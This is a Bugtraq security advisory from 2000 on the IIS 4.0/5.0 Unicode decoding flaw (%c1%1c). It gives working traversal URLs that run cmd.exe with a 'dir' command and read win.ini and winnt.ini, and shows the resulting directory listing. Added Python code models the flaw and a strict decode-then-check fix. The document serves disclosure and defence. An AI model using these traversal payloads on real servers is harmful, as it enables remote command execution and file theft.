Bugtraq mailing list archives

Re: IIS %c1%1c remote command execution


From: Nsfocus Security Team <security () NSFOCUS COM>
Date: Wed, 18 Oct 2000 15:35:31 +0800

We found this bug several weeks ago.
When we were ready to report it to Microsoft, we found it had been posted to BugTraq.

A member of our team disassembled the IIS 5.0 (Chinese version) Unicode decoding
implementation and found a strange decoding method that IIS uses when it finds "%c1%hh" or
"%c0%hh" (0x00 <= 0xhh < 0x40):

IIS will decode "%c1%hh" to (0xc1 - 0xc0) * 0x40 + 0xhh.
IIS will decode "%c0%hh" to (0xc0 - 0xc0) * 0x40 + 0xhh.


Example (Windows 2000 + IIS 5.0 + SP1, Simplified Chinese version):

http://192.168.8.48/A.ida/%c1%00.ida
IIS said "@.ida" can't be found
here: (0xc1-0xc0)*0x40+0x00=0x40='@'

http://192.168.8.48/A.ida/%c1%01.ida
IIS said "A.ida" can't be found
here: (0xc1-0xc0)*0x40+0x01=0x41='A'

http://192.168.8.48/A.ida/%c1%02.ida
IIS said "B.ida" can't be found
....

http://192.168.8.48/A.ida/%c0%21.ida
IIS said "!.ida" can't be found
...

It means you can encode most characters with this feature.
For example:

%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'

We guess that we can use it to bypass some directory restrictions:

(1)
http://192.168.8.48/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

Now we get:

 Directory of d:\inetpub\scripts

2000-09-28  15:49       <DIR>          .
2000-09-28  15:49       <DIR>          ..
1999-07-21  17:49              147,456 Count.exe
2000-09-12  17:08              438,290 Count25.exe
2000-10-13  15:03                8,867 counter.err
2000-08-23  23:07              160,002 counter.exe
1999-05-25  18:14                3,925 CountNT.html
1999-07-21  17:49               64,512 extdgts.exe
2000-08-10  15:24               46,352 ism.dll
1999-07-21  17:49               64,512 mkstrip.exe
1999-05-25  18:18                1,317 README.txt
2000-09-28  15:49       <DIR>          wcount
               9 File(s)        935,233 bytes

(2) We can get the content of some system files with this bug too:

http://192.168.8.48/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini

IIS deems it to be a request for a .ASP file. It will call asp.dll to open
the file win.ini.

For IIS 4.0 + SP6 (Chinese), the URL above failed. It seems that IIS is getting
smarter. But we found it interesting that we can use this malformed URL
to trick IIS into returning winnt.ini:

http://192.168.8.100/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini

"default.asp" should be an existing .ASP file.
"a.exe" is a random .EXE file name. It can be a nonexistent file.

It looks like the English versions of IIS 4.0/5.0 have a different decoding implementation.

---Original Message---
Recently I received an email from Par Osterberg that directed my attention
to a post in the Packetstorm forums:

http://209.143.242.119/cgi-bin/cbmc/forums.cgi?authkey=anonymous&uname=anonymous&datopic=Windows&mesgcheck=defined&gum=474&editoron=

[...]

- rain forest puppy

Regards,
Nsfocus Security Team <security () nsfocus com>
http://www.nsfocus.com
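Added illustration, not part of the post above and not IIS's code: a Python model of the two-byte decoding formula the post gives, beside a conforming UTF-8 decoder, and a comparison of checking the path before decoding (the order the observed behaviour implies) against decoding strictly first and canonicalizing afterwards. The root `d:/inetpub/scripts` comes from the directory listing in the post; the function names and the flawed-order model are my own assumptions, built only from the formula and behaviour the post describes.

```python
# Added illustration, not code from the post and not IIS's implementation.
import posixpath
from urllib.parse import unquote_to_bytes

# Root of the /scripts virtual directory, taken from the listing in the post.
SCRIPTS_ROOT = "d:/inetpub/scripts"


def lenient_decode(raw_path: str) -> str:
    """Model of the decoding the post reverse-engineered (assumption: only the
    formula given there is modelled). A lead byte of 0xc0 or 0xc1 followed by a
    byte below 0x40 is accepted and mapped to (lead - 0xc0) * 0x40 + second,
    so %c1%1c becomes 0x5c, the backslash. Other non-ASCII bytes are replaced."""
    data = unquote_to_bytes(raw_path)
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and data[i + 1] < 0x40:
            out.append(chr((b - 0xC0) * 0x40 + data[i + 1]))
            i += 2
        elif b < 0x80:
            out.append(chr(b))
            i += 1
        else:
            out.append("\ufffd")  # outside the modelled formula
            i += 1
    return "".join(out)


def strict_decode(raw_path: str):
    """Conforming UTF-8 decoding: 0xc0 and 0xc1 can never start a valid
    sequence (any such sequence would be overlong), so %c1%1c is rejected.
    Returns None for malformed input."""
    try:
        return unquote_to_bytes(raw_path).decode("utf-8")
    except UnicodeDecodeError:
        return None


def stays_within(path: str, root: str) -> bool:
    """Canonicalize, treating '\\' as a separator as Windows does, and require
    the result to remain under the virtual directory root."""
    rel = path.replace("\\", "/").lstrip("/")
    resolved = posixpath.normpath(posixpath.join(root, rel))
    return resolved == root or resolved.startswith(root + "/")


def check_then_decode(raw_path: str, root: str = SCRIPTS_ROOT):
    """Model of the flawed order: canonicalize the still-encoded path first,
    then hand the leniently decoded result to the filesystem. At check time
    '..%c1%1c..' is one opaque component that the following '..' pops, so the
    request appears to stay under root, yet the decoded path walks out of it.
    Returns (allowed, path_the_filesystem_would_open)."""
    return stays_within(raw_path, root), lenient_decode(raw_path)


def is_safe_request(raw_path: str, root: str = SCRIPTS_ROOT) -> bool:
    """Decode strictly first (malformed UTF-8 is refused), then check the
    canonical path. The order is the whole point: the check must see the
    same bytes the filesystem will see."""
    decoded = strict_decode(raw_path)
    if decoded is None:
        return False
    return stays_within(decoded, root)


if __name__ == "__main__":
    req = "..%c1%1c../winnt/system32/cmd.exe"   # path portion from the post
    allowed, fs_path = check_then_decode(req)
    print("check-then-decode allows it:", allowed, "-> opens", fs_path)
    print("decode-then-check allows it:", is_safe_request(req))
```

Run as a script it prints both decisions for the request from the post; the first model lets the request through and would open `..\../winnt/system32/cmd.exe` relative to the scripts directory, the second refuses it at the decoding step before any path comparison is made.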

